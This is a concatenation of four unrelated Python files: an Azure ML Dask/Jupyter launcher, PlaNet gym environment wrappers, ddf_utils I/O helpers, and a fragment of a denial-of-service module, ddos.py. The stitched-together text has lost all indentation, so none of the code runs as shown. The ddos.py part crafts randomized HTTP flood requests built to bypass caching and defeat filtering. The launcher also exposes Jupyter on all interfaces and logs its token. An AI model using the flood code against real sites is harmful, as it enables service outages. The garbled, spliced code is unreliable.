# url : https://github.com/Azure/azureml-examples/tree/main/cli/jobs/single-step/dask/nyctaxi
import os
import argparse
import time
from dask.distributed import Client, get_task_stream
import sys, uuid
import threading
import subprocess
import socket
import mlflow
from bokeh.io import export_png # dashboard 保存
from notebook.notebookapp import list_running_servers
def flush(proc, proc_log):
while True:
proc_out = proc.stdout.readline()
if proc_out == "" and proc.poll() is not None:
proc_log.close()
break
elif proc_out:
sys.stdout.write(proc_out)
proc_log.write(proc_out)
proc_log.flush()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--jupyter_token", default=uuid.uuid1().hex)
parser.add_argument("--script")
args, unparsed = parser.parse_known_args()
for k, v in os.environ.items():
if k.startswith("MLFLOW"):
print(k, v)
MLFLOW_RUN_ID = os.getenv("MLFLOW_RUN_ID")
# Dashboard の保存
client = Client()
# 環境変数から、Daskの起動時に必要な情報を取得する
print(
"- env: AZ_BATCHAI_JOB_MASTER_NODE_IP: ",
os.environ.get("AZ_BATCHAI_JOB_MASTER_NODE_IP"),
)
print(
"- env: AZ_BATCHAI_IS_CURRENT_NODE_MASTER: ",
os.environ.get("AZ_BATCHAI_IS_CURRENT_NODE_MASTER"),
)
print("- env: AZ_BATCHAI_NODE_IP: ", os.environ.get("AZ_BATCHAI_NODE_IP"))
print("- env: AZ_BATCH_HOST_LIST: ", os.environ.get("AZ_BATCH_HOST_LIST"))
print("- env: AZ_BATCH_NODE_LIST: ", os.environ.get("AZ_BATCH_NODE_LIST"))
print("- env: MASTER_ADDR: ", os.environ.get("MASTER_ADDR"))
print("- env: MASTER_PORT: ", os.environ.get("MASTER_PORT"))
print("- env: RANK: ", os.environ.get("RANK"))
print("- env: LOCAL_RANK: ", os.environ.get("LOCAL_RANK"))
print("- env: NODE_RANK: ", os.environ.get("NODE_RANK"))
print("- env: WORLD_SIZE: ", os.environ.get("WORLD_SIZE"))
rank = os.environ.get("RANK")
ip = socket.gethostbyname(socket.gethostname())
master = os.environ.get("MASTER_ADDR")
master_port = os.environ.get("MASTER_PORT")
print("- my rank is ", rank)
print("- my ip is ", ip)
print("- master is ", master)
print("- master port is ", master_port)
scheduler = master + ":8786"
dashboard = master + ":8787"
print("- scheduler is ", scheduler)
print("- dashboard is ", dashboard)
print("args: ", args)
print("unparsed: ", unparsed)
print("- my rank is ", rank)
print("- my ip is ", ip)
if not os.path.exists("logs"):
os.makedirs("logs")
print("free disk space on /tmp")
os.system(f"df -P /tmp")
mlflow.log_param("WORLD_SIZE", os.environ.get("WORLD_SIZE"))
# RANK 0 での処理
if str(rank) == "0":
mlflow.log_param("headnode", ip)
mlflow.log_param(
"cluster",
"scheduler: {scheduler}, dashboard: {dashboard}".format(
scheduler=scheduler, dashboard=dashboard
),
)
cmd = (
"jupyter lab --ip 0.0.0.0 --port 8888"
+ " --NotebookApp.token={token}"
+ " --allow-root --no-browser"
).format(token=args.jupyter_token)
os.environ["MLFLOW_RUN_ID"] = MLFLOW_RUN_ID
jupyter_log = open("logs/jupyter_log.txt", "w")
jupyter_proc = subprocess.Popen(
cmd.split(),
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
jupyter_flush = threading.Thread(target=flush, args=(jupyter_proc, jupyter_log))
jupyter_flush.start()
# while not list(list_running_servers()):
# time.sleep(5)
# jupyter_servers = list(list_running_servers())
# assert (len(jupyter_servers) == 1), "more than one jupyter server is running"
mlflow.log_param(
"jupyter", "ip: {ip_addr}, port: {port}".format(ip_addr=ip, port="8888")
)
mlflow.log_param("jupyter-token", args.jupyter_token)
cmd = (
"dask-scheduler "
+ "--port "
+ scheduler.split(":")[1]
+ " --dashboard-address "
+ dashboard
)
print(cmd)
os.environ["MLFLOW_RUN_ID"] = MLFLOW_RUN_ID
scheduler_log = open("logs/scheduler_log.txt", "w")
scheduler_proc = subprocess.Popen(
cmd.split(),
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
scheduler_flush = threading.Thread(
target=flush, args=(scheduler_proc, scheduler_log)
)
scheduler_flush.start()
cmd = "dask-worker " + scheduler
print(cmd)
os.environ["MLFLOW_RUN_ID"] = MLFLOW_RUN_ID
worker_log = open("logs/worker_{rank}_log.txt".format(rank=rank), "w")
worker_proc = subprocess.Popen(
cmd.split(),
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
worker_flush = threading.Thread(target=flush, args=(worker_proc, worker_log))
worker_flush.start()
print("### OUTPUT STREAM ###")
with get_task_stream(client, plot='save', filename='task_stream.html') as ts:
futs = client.map(lambda x: time.sleep(x**2), range(5))
results = client.gather(futs)
if args.script:
command_line = " ".join(["python", args.script] + unparsed)
print("Launching:", command_line)
os.environ["MLFLOW_RUN_ID"] = MLFLOW_RUN_ID
driver_log = open("logs/driver_log.txt", "w")
driver_proc = subprocess.Popen(
command_line.split(),
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
driver_flush = threading.Thread(
target=flush, args=(driver_proc, driver_log)
)
driver_flush.start()
# Wait until process terminates (without using p.wait())
# while driver_proc.poll() is None:
# # Process hasn't exited yet, let's wait some
# time.sleep(0.5)
print("waiting for driver process to terminate")
driver_proc.wait()
exit_code = driver_proc.returncode
print("process ended with code", exit_code)
print("killing scheduler, worker and jupyter")
jupyter_proc.kill()
scheduler_proc.kill()
worker_proc.kill()
exit(exit_code)
export_png(ts.figure, filename="./outputs/plot_{rank}.png")
else:
flush(scheduler_proc, scheduler_log)
# RANK 0 以外の処理
else:
cmd = "dask-worker " + scheduler
print(cmd)
os.environ["MLFLOW_RUN_ID"] = MLFLOW_RUN_ID
worker_log = open("logs/worker_{rank}_log.txt".format(rank=rank), "w")
worker_proc = subprocess.Popen(
cmd.split(),
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
flush(worker_proc, worker_log)
|
wrappers.py
|
# Copyright 2019 The PlaNet Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Environment wrappers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import datetime
import io
import os
import sys
import traceback
import uuid
import gym
import gym.spaces
import numpy as np
import skimage.transform
import tensorflow as tf
from planet.tools import nested
class ObservationDict(object):
def __init__(self, env, key='observ'):
self._env = env
self._key = key
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
spaces = {self._key: self._env.observation_space}
return gym.spaces.Dict(spaces)
@property
def action_space(self):
return self._env.action_space
def step(self, action):
obs, reward, done, info = self._env.step(action)
obs = {self._key: np.array(obs)}
return obs, reward, done, info
def reset(self):
obs = self._env.reset()
obs = {self._key: np.array(obs)}
return obs
class ConcatObservation(object):
"""Select observations from a dict space and concatenate them."""
def __init__(self, env, keys):
self._env = env
self._keys = keys
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
spaces = self._env.observation_space.spaces
spaces = [spaces[key] for key in self._keys]
low = np.concatenate([space.low for space in spaces], 0)
high = np.concatenate([space.high for space in spaces], 0)
dtypes = [space.dtype for space in spaces]
if not all(dtype == dtypes[0] for dtype in dtypes):
message = 'Spaces must have the same data type; are {}.'
raise KeyError(message.format(', '.join(str(x) for x in dtypes)))
return gym.spaces.Box(low, high, dtype=dtypes[0])
def step(self, action):
obs, reward, done, info = self._env.step(action)
obs = self._select_keys(obs)
return obs, reward, done, info
def reset(self):
obs = self._env.reset()
obs = self._select_keys(obs)
return obs
def _select_keys(self, obs):
return np.concatenate([obs[key] for key in self._keys], 0)
class SelectObservations(object):
def __init__(self, env, keys):
self._env = env
self._keys = keys
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
spaces = self._env.observation_space.spaces
return gym.spaces.Dict({key: spaces[key] for key in self._keys})
@property
def action_space(self):
return self._env.action_space
def step(self, action, *args, **kwargs):
obs, reward, done, info = self._env.step(action, *args, **kwargs)
obs = {key: obs[key] for key in self._keys}
return obs, reward, done, info
def reset(self, *args, **kwargs):
obs = self._env.reset(*args, **kwargs)
obs = {key: obs[key] for key in self._keys}
return obs
class PixelObservations(object):
def __init__(self, env, size=(64, 64), dtype=np.uint8, key='image'):
assert isinstance(env.observation_space, gym.spaces.Dict)
self._env = env
self._size = size
self._dtype = dtype
self._key = key
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
high = {np.uint8: 255, np.float: 1.0}[self._dtype]
image = gym.spaces.Box(0, high, self._size + (3,), dtype=self._dtype)
spaces = self._env.observation_space.spaces.copy()
assert self._key not in spaces
spaces[self._key] = image
return gym.spaces.Dict(spaces)
@property
def action_space(self):
return self._env.action_space
def step(self, action):
obs, reward, done, info = self._env.step(action)
obs[self._key] = self._render_image()
return obs, reward, done, info
def reset(self):
obs = self._env.reset()
obs[self._key] = self._render_image()
return obs
def _render_image(self):
image = self._env.render('rgb_array')
if image.shape[:2] != self._size:
kwargs = dict(
output_shape=self._size, mode='edge', order=1, preserve_range=True)
image = skimage.transform.resize(image, **kwargs).astype(image.dtype)
if self._dtype and image.dtype != self._dtype:
if image.dtype in (np.float32, np.float64) and self._dtype == np.uint8:
image = (image * 255).astype(self._dtype)
elif image.dtype == np.uint8 and self._dtype in (np.float32, np.float64):
image = image.astype(self._dtype) / 255
else:
message = 'Cannot convert observations from {} to {}.'
raise NotImplementedError(message.format(image.dtype, self._dtype))
return image
class ObservationToRender(object):
def __init__(self, env, key='image'):
self._env = env
self._key = key
self._image = None
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
return gym.spaces.Dict({})
def step(self, action):
obs, reward, done, info = self._env.step(action)
self._image = obs.pop(self._key)
return obs, reward, done, info
def reset(self):
obs = self._env.reset()
self._image = obs.pop(self._key)
return obs
def render(self, *args, **kwargs):
return self._image
class OverwriteRender(object):
def __init__(self, env, render_fn):
self._env = env
self._render_fn = render_fn
self._env.render('rgb_array') # Set up viewer.
def __getattr__(self, name):
return getattr(self._env, name)
def render(self, *args, **kwargs):
return self._render_fn(self._env, *args, **kwargs)
class ActionRepeat(object):
"""Repeat the agent action multiple steps."""
def __init__(self, env, amount):
self._env = env
self._amount = amount
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
done = False
total_reward = 0
current_step = 0
while current_step < self._amount and not done:
observ, reward, done, info = self._env.step(action)
total_reward += reward
current_step += 1
return observ, total_reward, done, info
class NormalizeActions(object):
def __init__(self, env):
self._env = env
low, high = env.action_space.low, env.action_space.high
self._enabled = np.logical_and(np.isfinite(low), np.isfinite(high))
self._low = np.where(self._enabled, low, -np.ones_like(low))
self._high = np.where(self._enabled, high, np.ones_like(low))
def __getattr__(self, name):
return getattr(self._env, name)
@property
def action_space(self):
space = self._env.action_space
low = np.where(self._enabled, -np.ones_like(space.low), space.low)
high = np.where(self._enabled, np.ones_like(space.high), space.high)
return gym.spaces.Box(low, high, dtype=space.dtype)
def step(self, action):
action = (action + 1) / 2 * (self._high - self._low) + self._low
return self._env.step(action)
class DeepMindWrapper(object):
"""Wraps a DM Control environment into a Gym interface."""
metadata = {'render.modes': ['rgb_array']}
reward_range = (-np.inf, np.inf)
def __init__(self, env, render_size=(64, 64), camera_id=0):
self._env = env
self._render_size = render_size
self._camera_id = camera_id
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
components = {}
for key, value in self._env.observation_spec().items():
components[key] = gym.spaces.Box(
-np.inf, np.inf, value.shape, dtype=np.float32)
return gym.spaces.Dict(components)
@property
def action_space(self):
action_spec = self._env.action_spec()
return gym.spaces.Box(
action_spec.minimum, action_spec.maximum, dtype=np.float32)
def step(self, action):
time_step = self._env.step(action)
obs = dict(time_step.observation)
reward = time_step.reward or 0
done = time_step.last()
info = {'discount': time_step.discount}
return obs, reward, done, info
def reset(self):
time_step = self._env.reset()
return dict(time_step.observation)
def render(self, *args, **kwargs):
if kwargs.get('mode', 'rgb_array') != 'rgb_array':
raise ValueError("Only render mode 'rgb_array' is supported.")
del args # Unused
del kwargs # Unused
return self._env.physics.render(
*self._render_size, camera_id=self._camera_id)
class MaximumDuration(object):
"""Limits the episode to a given upper number of decision points."""
def __init__(self, env, duration):
self._env = env
self._duration = duration
self._step = None
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
if self._step is None:
raise RuntimeError('Must reset environment.')
observ, reward, done, info = self._env.step(action)
self._step += 1
if self._step >= self._duration:
done = True
self._step = None
return observ, reward, done, info
def reset(self):
self._step = 0
return self._env.reset()
class MinimumDuration(object):
"""Extends the episode to a given lower number of decision points."""
def __init__(self, env, duration):
self._env = env
self._duration = duration
self._step = None
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
observ, reward, done, info = self._env.step(action)
self._step += 1
if self._step < self._duration:
done = False
return observ, reward, done, info
def reset(self):
self._step = 0
return self._env.reset()
class ProcessObservation(object):
def __init__(self, env, process_fn):
self._env = env
self._process_fn = process_fn
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
return nested.map(
lambda box: gym.spaces.Box(
self._process_fn(box.low),
self._process_fn(box.high),
dtype=self._process_fn(box.low).dtype),
self._env.observation_space)
def step(self, action):
observ, reward, done, info = self._env.step(action)
observ = self._process_fn(observ)
return observ, reward, done, info
def reset(self):
observ = self._env.reset()
observ = self._process_fn(observ)
return observ
class PadActions(object):
"""Pad action space to the largest action space."""
def __init__(self, env, spaces):
self._env = env
self._action_space = self._pad_box_space(spaces)
@property
def observation_space(self):
return self._env.observation_space
@property
def action_space(self):
return self._action_space
def step(self, action, *args, **kwargs):
action = action[:len(self._env.action_space.low)]
return self._env.step(action, *args, **kwargs)
def reset(self, *args, **kwargs):
return self._env.reset(*args, **kwargs)
def _pad_box_space(self, spaces):
assert all(len(space.low.shape) == 1 for space in spaces)
length = max(len(space.low) for space in spaces)
low, high = np.inf * np.ones(length), -np.inf * np.ones(length)
for space in spaces:
low[:len(space.low)] = np.minimum(space.low, low[:len(space.low)])
high[:len(space.high)] = np.maximum(space.high, high[:len(space.high)])
return gym.spaces.Box(low, high, dtype=np.float32)
class CollectGymDataset(object):
"""Collect transition tuples and store episodes as Numpy files.
The time indices of the collected epiosde use the convention that at each
time step, the agent first decides on an action, and the environment then
returns the reward and observation.
This means the action causes the environment state and thus observation and
rewards at the same time step. A dynamics model can thus predict the sequence
of observations and rewards from the sequence of actions.
The first transition tuple contains the observation returned from resetting
the environment, together with zeros for the action and reward. Thus, the
episode length is one more than the number of decision points.
"""
def __init__(self, env, outdir):
self._env = env
self._outdir = outdir and os.path.expanduser(outdir)
self._episode = None
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action, *args, **kwargs):
if kwargs.get('blocking', True):
transition = self._env.step(action, *args, **kwargs)
return self._process_step(action, *transition)
else:
future = self._env.step(action, *args, **kwargs)
return lambda: self._process_step(action, *future())
def reset(self, *args, **kwargs):
if kwargs.get('blocking', True):
observ = self._env.reset(*args, **kwargs)
return self._process_reset(observ)
else:
future = self._env.reset(*args, **kwargs)
return lambda: self._process_reset(future())
def _process_step(self, action, observ, reward, done, info):
transition = self._process_observ(observ).copy()
transition['action'] = action
transition['reward'] = reward
self._episode.append(transition)
if done:
episode = self._get_episode()
if self._outdir:
filename = self._get_filename()
self._write(episode, filename)
return observ, reward, done, info
def _process_reset(self, observ):
# Resetting the environment provides the observation for time step zero.
# The action and reward are not known for this time step, so we zero them.
transition = self._process_observ(observ).copy()
transition['action'] = np.zeros_like(self.action_space.low)
transition['reward'] = 0.0
self._episode = [transition]
return observ
def _process_observ(self, observ):
if not isinstance(observ, dict):
observ = {'observ': observ}
return observ
def _get_filename(self):
timestamp = datetime.datetime.now().strftime('%Y%m%dT%H%M%S')
identifier = str(uuid.uuid4()).replace('-', '')
filename = '{}-{}.npz'.format(timestamp, identifier)
filename = os.path.join(self._outdir, filename)
return filename
def _get_episode(self):
episode = {k: [t[k] for t in self._episode] for k in self._episode[0]}
episode = {k: np.array(v) for k, v in episode.items()}
for key, sequence in episode.items():
if sequence.dtype == 'object':
message = "Sequence '{}' is not numeric:\n{}"
raise RuntimeError(message.format(key, sequence))
return episode
def _write(self, episode, filename):
if not tf.gfile.Exists(self._outdir):
tf.gfile.MakeDirs(self._outdir)
with io.BytesIO() as file_:
np.savez_compressed(file_, **episode)
file_.seek(0)
with tf.gfile.Open(filename, 'w') as ff:
ff.write(file_.read())
folder = os.path.basename(self._outdir)
name = os.path.splitext(os.path.basename(filename))[0]
print('Recorded episode {} to {}.'.format(name, folder))
class ConvertTo32Bit(object):
"""Convert data types of an OpenAI Gym environment to 32 bit."""
def __init__(self, env):
self._env = env
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
observ, reward, done, info = self._env.step(action)
observ = nested.map(self._convert_observ, observ)
reward = self._convert_reward(reward)
return observ, reward, done, info
def reset(self):
observ = self._env.reset()
observ = nested.map(self._convert_observ, observ)
return observ
def _convert_observ(self, observ):
if not np.isfinite(observ).all():
raise ValueError('Infinite observation encountered.')
if observ.dtype == np.float64:
return observ.astype(np.float32)
if observ.dtype == np.int64:
return observ.astype(np.int32)
return observ
def _convert_reward(self, reward):
if not np.isfinite(reward).all():
raise ValueError('Infinite reward encountered.')
return np.array(reward, dtype=np.float32)
class Async(object):
"""Step environment in a separate process for lock free paralellism."""
# Message types for communication via the pipe.
_ACCESS = 1
_CALL = 2
_RESULT = 3
_EXCEPTION = 4
_CLOSE = 5
def __init__(self, constructor, strategy='thread'):
"""Step environment in a separate process for lock free parallelism.
The environment will be created in the external process by calling the
specified callable. This can be an environment class, or a function
creating the environment and potentially wrapping it. The returned
environment should not access global variables.
Args:
constructor: Callable that creates and returns an OpenAI gym environment.
Attributes:
observation_space: The cached observation space of the environment.
action_space: The cached action space of the environment.
"""
if strategy == 'thread':
import multiprocessing.dummy as mp
elif strategy == 'process':
import multiprocessing as mp
else:
raise NotImplementedError(strategy)
self._conn, conn = mp.Pipe()
self._process = mp.Process(target=self._worker, args=(constructor, conn))
atexit.register(self.close)
self._process.start()
self._observ_space = None
self._action_space = None
@property
def observation_space(self):
if not self._observ_space:
self._observ_space = self.__getattr__('observation_space')
return self._observ_space
@property
def action_space(self):
if not self._action_space:
self._action_space = self.__getattr__('action_space')
return self._action_space
def __getattr__(self, name):
"""Request an attribute from the environment.
Note that this involves communication with the external process, so it can
be slow.
Args:
name: Attribute to access.
Returns:
Value of the attribute.
"""
self._conn.send((self._ACCESS, name))
return self._receive()
def call(self, name, *args, **kwargs):
"""Asynchronously call a method of the external environment.
Args:
name: Name of the method to call.
*args: Positional arguments to forward to the method.
**kwargs: Keyword arguments to forward to the method.
Returns:
Promise object that blocks and provides the return value when called.
"""
payload = name, args, kwargs
self._conn.send((self._CALL, payload))
return self._receive
def close(self):
"""Send a close message to the external process and join it."""
try:
self._conn.send((self._CLOSE, None))
self._conn.close()
except IOError:
# The connection was already closed.
pass
self._process.join()
def step(self, action, blocking=True):
"""Step the environment.
Args:
action: The action to apply to the environment.
blocking: Whether to wait for the result.
Returns:
Transition tuple when blocking, otherwise callable that returns the
transition tuple.
"""
promise = self.call('step', action)
if blocking:
return promise()
else:
return promise
def reset(self, blocking=True):
"""Reset the environment.
Args:
blocking: Whether to wait for the result.
Returns:
New observation when blocking, otherwise callable that returns the new
observation.
"""
promise = self.call('reset')
if blocking:
return promise()
else:
return promise
def _receive(self):
"""Wait for a message from the worker process and return its payload.
Raises:
Exception: An exception was raised inside the worker process.
KeyError: The received message is of an unknown type.
Returns:
Payload object of the message.
"""
try:
message, payload = self._conn.recv()
except OSError:
raise RuntimeError('Environment worker crashed.')
# Re-raise exceptions in the main process.
if message == self._EXCEPTION:
stacktrace = payload
raise Exception(stacktrace)
if message == self._RESULT:
return payload
raise KeyError('Received message of unexpected type {}'.format(message))
def _worker(self, constructor, conn):
"""The process waits for actions and sends back environment results.
Args:
constructor: Constructor for the OpenAI Gym environment.
conn: Connection for communication to the main process.
Raises:
KeyError: When receiving a message of unknown type.
"""
try:
env = constructor()
while True:
try:
# Only block for short times to have keyboard exceptions be raised.
if not conn.poll(0.1):
continue
message, payload = conn.recv()
except (EOFError, KeyboardInterrupt):
break
if message == self._ACCESS:
name = payload
result = getattr(env, name)
conn.send((self._RESULT, result))
continue
if message == self._CALL:
name, args, kwargs = payload
result = getattr(env, name)(*args, **kwargs)
conn.send((self._RESULT, result))
continue
if message == self._CLOSE:
assert payload is None
break
raise KeyError('Received message of unknown type {}'.format(message))
except Exception:
stacktrace = ''.join(traceback.format_exception(*sys.exc_info()))
print('Error in environment process: {}'.format(stacktrace))
try:
conn.send((self._EXCEPTION, stacktrace))
except Exception:
print('Failed to send exception back to main process.')
try:
conn.close()
except Exception:
print('Failed to properly close connection.')
def get_repeat(task_str):
domain, _ = task_str.split('_')
if domain in ['walker', 'finger']:
repeat = 2
elif domain in ['cheetah', 'cup', 'reacher']:
repeat = 4
elif domain in ['cartpole']:
repeat = 8
else:
raise NotImplementedError('{} env cannot be found'.format(domain))
return repeat
|
io.py
|
# -*- coding: utf-8 -*-
"""io functions for ddf files"""
import os
import shutil
import json
import threading
import time
import typing
from urllib.parse import urlsplit
from io import BytesIO
import pandas as pd
import requests as req
from ddf_utils.str import format_float_digits
from ddf_utils.package import get_datapackage
# helper for dumping datapackage json
def dump_json(path, obj):
"""convenient function to dump a dictionary object to json"""
with open(path, 'w+') as f:
json.dump(obj, f, ensure_ascii=False, indent=4)
f.close()
# TODO: integrate with Ingredient.serve
def serve_datapoint(df_: pd.DataFrame, out_dir, concept, copy=True,
by: typing.Iterable = None,
formatter: typing.Callable = format_float_digits, **kwargs):
"""save a pandas dataframe to datapoint file.
the file path of csv will be out_dir/ddf--datapoints--$concept--$by.csv
addition keyword arguments can be passed to `pd.DataFrame.to_csv()` function.
"""
if copy:
df = df_.copy()
else:
df = df_
# formatting the concept column
if formatter is not None:
df[concept] = df[concept].map(formatter)
if by is None:
by = df.index.names
by = '--'.join(by)
path = os.path.join(out_dir, 'ddf--datapoints--{}--by--{}.csv'.format(concept, by))
df.to_csv(path, **kwargs)
def serve_concept():
pass
def serve_entity():
pass
def open_google_spreadsheet(docid):
"""read google spreadsheet into excel io object"""
tmpl_xls = "https://docs.google.com/spreadsheets/d/{docid}/export?format=xlsx&id={docid}"
url = tmpl_xls.format(docid=docid)
res = req.get(url)
if res.ok:
return BytesIO(res.content)
return None
def cleanup(path, how='ddf', exclude=None, use_default_exclude=True):
"""remove all ddf files in the given path"""
default_exclude = ['etl', 'lang', 'langsplit', 'datapackage.json', 'README.md', 'assets']
if exclude and not isinstance(exclude, list):
if isinstance(exclude, tuple):
exclude = list(exclude) # this is not working for str. and [exclude] not working for tuple
else:
exclude = [exclude]
if use_default_exclude:
if exclude:
for e in default_exclude:
exclude.append(e)
else:
exclude = default_exclude
if how == 'ddf':
for f in os.listdir(path):
# only keep dot files and etl/ lang/ langsplit/ and datapackage.json
if f not in exclude and not f.startswith('.'):
p = os.path.join(path, f)
if os.path.isdir(p):
shutil.rmtree(p)
else:
os.remove(p)
# TODO: think a best way to handle metadata in datapackage.json
# if os.path.exists(os.path.join(path, 'datapackage.json')):
# os.remove(os.path.join(path, 'datapackage.json'))
if how == 'lang':
if os.path.exists(os.path.join(path, 'lang')):
shutil.rmtree(os.path.join(path, 'lang'))
if how == 'langsplit':
if os.path.exists(os.path.join(path, 'langsplit')):
shutil.rmtree(os.path.join(path, 'langsplit'))
def download_csv(urls, out_path):
"""download csv files"""
def download(url_, out_path_):
r = req.get(url_, stream=True)
total_length = int(r.headers.get('content-length'))
if total_length == 0:
return
fn = urlsplit(url_).path.split('/')[-1]
print('writing to: {}\n'.format(fn), end='')
with open(os.path.join(out_path, fn), 'wb') as fd:
for chunk in r.iter_content(chunk_size=128):
fd.write(chunk)
def create_tread(url_, out_path_):
download_thread = threading.Thread(target=download, args=(url_, out_path_))
download_thread.start()
return download_thread
threads = []
for url in urls:
threads.append(create_tread(url, out_path))
# wait until all downloads are done
is_alive = [t.is_alive() for t in threads]
while any(is_alive):
time.sleep(1)
is_alive = [t.is_alive() for t in threads]
def csvs_to_ddf(files, out_path):
"""convert raw files to ddfcsv
Args
----
files: list
a list of file paths to build ddf csv
out_path: `str`
the directory to put the ddf dataset
"""
import re
from os.path import join
from ddf_utils.str import to_concept_id
concepts_df = pd.DataFrame([['name', 'Name', 'string']],
columns=['concept', 'name', 'concept_type'])
concepts_df = concepts_df.set_index('concept')
all_entities = dict()
pattern = r'indicators--by--([ 0-9a-zA-Z_-]*).csv'
for f in files:
data = pd.read_csv(f)
basename = os.path.basename(f)
keys = re.match(pattern, basename).groups()[0].split('--')
keys_alphanum = list(map(to_concept_id, keys))
# check if there is a time column. Assume last column is time.
try:
pd.to_datetime(data[keys[-1]], format='%Y')
except (ValueError, pd.tslib.OutOfBoundsDatetime):
has_time = False
else:
has_time = True
if has_time:
ent_keys = keys[:-1]
else:
ent_keys = keys
# set concept type
for col in data.columns:
concept = to_concept_id(col)
if col in keys:
if col in ent_keys:
t = 'entity_domain'
else:
t = 'time'
else:
t = 'measure'
concepts_df.loc[concept] = [col, t]
for ent in ent_keys:
ent_df = data[[ent]].drop_duplicates().copy()
ent_concept = to_concept_id(ent)
ent_df.columns = ['name']
ent_df[ent_concept] = ent_df.name.map(to_concept_id)
if ent_concept not in all_entities.keys():
all_entities[ent_concept] = ent_df
else:
all_entities[ent_concept] = pd.concat([all_entities[ent_concept], ent_df],
ignore_index=True)
data = data.set_index(keys)
for c in data:
# output datapoints
df = data[c].copy()
df = df.reset_index()
for k in keys[:-1]:
df[k] = df[k].map(to_concept_id)
df.columns = df.columns.map(to_concept_id)
(df.dropna()
.to_csv(join(out_path,
'ddf--datapoints--{}--by--{}.csv'.format(
to_concept_id(c), '--'.join(keys_alphanum))),
index=False))
# output concepts
concepts_df.to_csv(join(out_path, 'ddf--concepts.csv'))
# output entities
for c, df in all_entities.items():
df.to_csv(join(out_path, 'ddf--entities--{}.csv'.format(c)), index=False)
dp = get_datapackage(out_path, use_existing=False)
dump_json(os.path.join(out_path, 'datapackage.json'), dp)
return
|
ddos.py
|
import requests,cfscrape,socks,os,sys,urllib,socket,random,time,threading,ssl
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
#import the dependencies for each python version
if sys.version_info < (3,0):
# Python 2.x
import httplib
import urllib2
from scapy.config import conf
conf.ipv6_enabled = False
from scapy.all import *
else:
# Python 3.x
import http.client
httplib = http.client
import urllib.request
urllib2=urllib.request
from kamene.config import conf
conf.ipv6_enabled = False
from kamene.all import *
from struct import *
from bane.iot import getip
from bane.payloads import *
from bane.proxer import *
if os.path.isdir('/data/data')==True:
adr=True#the device is an android
if os.path.isdir('/data/data/com.termux/')==True:
termux=True#the application which runs the module is Termux
if ((termux==False) or (adr==False)):
from bane.swtch import *
def reorder_headers_randomly(s):
b=s.split('\r\n\r\n')[1]
a=s.split('\r\n\r\n')[0]
m=a.split('\r\n')[0]
c=a.split('\r\n')[1:]
random.shuffle(c)
return m+"\r\n"+"\r\n".join(c)+'\r\n\r\n'+b
def random_param():
a=random.randint(1,2)
if a==1:
return str(random.randint(1,1000))
else:
return random.choice(lis)
def setup_http_packet(target,ty,paths,post_field_min,post_field_max,post_min,post_max,cookie,user_agents):
pa=random.choice(paths)#bypassing cache engine
q=''
for i in range(random.randint(2,5)):
q+=random_param()+random_param()
p=''
for i in range(random.randint(2,5)):
p+=random_param()+random_param()
if '?' in pa:
jo='&'
else:
jo='?'
pa+=jo+q+"="+p
#setting random headers
for l in range(random.randint(1,5)):
ed=random.choice(ec)
oi=random.randint(1,3)
if oi==2:
gy=0
while gy<1:
df=random.choice(ec)
if df!=ed:
gy+=1
ed+=', '
ed+=df
l=random.choice(al)
for n in range(random.randint(0,5)):
l+=';q={},'.format(round(random.uniform(.1,1),1))+random.choice(al)
kl=random.randint(1,2)
ck=""
if cookie:
ck="Cookie: "+cookie+"\r\n"
if ty==1:
m='GET {} HTTP/1.1\r\n{}User-Agent: {}\r\nAccept: {}\r\nAccept-Language: {}\r\nAccept-Encoding: {}\r\nAccept-Charset: {}\r\nKeep-Alive: {}\r\nConnection: Keep-Alive\r\nCache-Control: {}\r\nReferer: {}\r\nHost: {}\r\n\r\n'.format(pa,ck,random.choice(user_agents),random.choice(a),l,ed,random.choice(ac),random.randint(100,1000),random.choice(cc),(random.choice(referers)+random.choice(lis)+str(random.randint(0,100000000))+random.choice(lis)),target)
else:
k=''
for _ in range(random.randint(post_field_min,post_field_max)):
k+=random.choice(lis)
j=''
for x in range(random.randint(post_min,post_max)):
j+=random.choice(lis)
par =k+'='+j
m= "POST {} HTTP/1.1\r\n{}User-Agent: {}\r\nAccept-language: {}\r\nConnection: keep-alive\r\nKeep-Alive: {}\r\nContent-Length: {}\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: {}\r\nHost: {}\r\n\r\n{}".format(pa,ck,random.choice(user_agents),l,random.randint(300,1000),len(par),(random.choice(referers)+random.choice(lis)+str(random.randint(0,100000000))+random.choice(lis)),target,par)
return reorder_headers_randomly(m)
def get_public_dns(timeout=15):
try:
return (requests.get('https://public-dns.info/nameservers.txt',timeout=timeout).text).split('\n')
except:
return []
def reset():#reset all values
global counter
counter=0
global stop
stop=False
global coo
coo=False
global ual
ual=[]
global flag
flag=-1
global ier
ier=0
global pointer
pointer=0
global ue
ue=[]
'''
